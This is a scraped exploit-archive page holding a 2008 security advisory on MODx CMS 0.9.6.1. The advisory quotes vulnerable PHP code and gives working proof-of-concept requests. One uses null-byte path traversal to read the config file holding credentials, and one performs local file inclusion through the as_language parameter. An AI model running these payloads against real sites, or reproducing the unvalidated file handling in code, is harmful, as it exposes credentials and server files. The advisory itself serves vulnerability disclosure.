477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
107 lines
3.6 KiB
Text
Executable file
107 lines
3.6 KiB
Text
Executable file
########################## WwW.BugReport.ir #########################
|
|
#
|
|
# AmnPardaz Security Research Team
|
|
#
|
|
# Title: MODx CMS Vulnerabilities
|
|
# Vendor: http://modxcms.com
|
|
# Bugs: Source code disclosure, local file inclusion
|
|
# Vulnerable Version: 0.9.6.1 (prior versions also may be affected)
|
|
# Exploitation: Remote with browser
|
|
# Fix Available: No!
|
|
################################################################
|
|
|
|
|
|
####################
|
|
- Description:
|
|
####################
|
|
|
|
quote from vendor: "MODx is an open source PHP Application Framework that helps you take control of your online content.
|
|
It empowers developers and advanced users to give as much control as desired to whomever they desire for day-to-day website content maintenance chores."
|
|
|
|
|
|
####################
|
|
- Vulnerability:
|
|
####################
|
|
|
|
+--> source code disclosure
|
|
|
|
Code Snippet:
|
|
|
|
/assets/js/htcmime.php Line#18-36
|
|
|
|
$fname = (array_key_exists("file", $_GET)) ? $_GET["file"] : "";
|
|
|
|
// basename() also strips \x00, we don't need to worry about ? and # in path:
|
|
// Must be real files anyway, fopen() does not support wildcards
|
|
$ext = array_pop(explode('.', basename($fname)));
|
|
if (strcasecmp($ext, "htc") != 0 || !file_exists($fname))
|
|
exit ("No file specified, file not found or illegal file.");
|
|
|
|
$flen = filesize($fname);
|
|
|
|
header("Content-type: text/x-component");
|
|
header("Content-Length: ".$flen);
|
|
header("Content-Disposition: inline; filename=$fname");
|
|
|
|
$fp = fopen($fname, "r");
|
|
|
|
echo fread($fp, $flen);
|
|
|
|
fclose($fp);
|
|
|
|
[as developer comments out] When magic_quotes_gpc is disabled, its possible to bypass extension check via null character injection
|
|
( because of null terminating behavior in any function that uses fopen_wrappers ) which could result in source code disclosure!
|
|
|
|
POC : http://localhost/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc
|
|
|
|
|
|
+-->Local file inclusion
|
|
|
|
Code Snippet:
|
|
|
|
/assets/snippets/AjaxSearch/AjaxSearch.php line#17-41
|
|
|
|
$stripHTML = $_POST['stripHTML'];
|
|
$stripSnip = $_POST['stripSnip'];
|
|
$stripSnippets = $_POST['stripSnippets'];
|
|
$useAllWords = $_POST['useAllWords'];
|
|
$searchStyle = $_POST['searchStyle'];
|
|
$minChars = $_POST['minChars'];
|
|
$maxResults = $_POST['maxResults'];
|
|
$showMoreResults = $_POST['showMoreResults'];
|
|
$moreResultsPage = $_POST['moreResultsPage'];
|
|
$as_language = $_POST['as_language'];
|
|
$extract = $_POST['extract'];
|
|
$docgrp = $_POST['docgrp'];
|
|
$highlightResult = $_POST['highlightResult'];
|
|
|
|
include_once MODX_BASE_PATH . 'assets/snippets/AjaxSearch/includes/AjaxSearch.inc.php';
|
|
include MODX_BASE_PATH . 'assets/snippets/AjaxSearch/includes/templates.inc.php';
|
|
|
|
#include default language file
|
|
include(MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/english.inc.php");
|
|
|
|
#include other language file if set.
|
|
if($as_language!="english" && $as_language != '') {
|
|
if(file_exists(MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/".$as_language.".inc.php"))
|
|
include MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/".$as_language.".inc.php";
|
|
}
|
|
|
|
There is no input validation here therefore its possible to set $as_language which could result in local file inclusion!
|
|
|
|
POC:
|
|
Method=POST
|
|
Action=http://localhost/modx-0.9.6.1/index-ajax.php?
|
|
Name=as_language Value=../ajaxSearch_readme.txt%00
|
|
Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php
|
|
|
|
####################
|
|
- Credit :
|
|
####################
|
|
Original Advisory:http://www.bugreport.ir/?/25
|
|
AmnPardaz Security Research Team
|
|
Contact: admin[4t}bugreport{d0t]ir
|
|
WwW.BugReport.ir
|
|
WwW.AmnPardaz.com
|
|
|
|
# milw0rm.com [2008-01-05]
|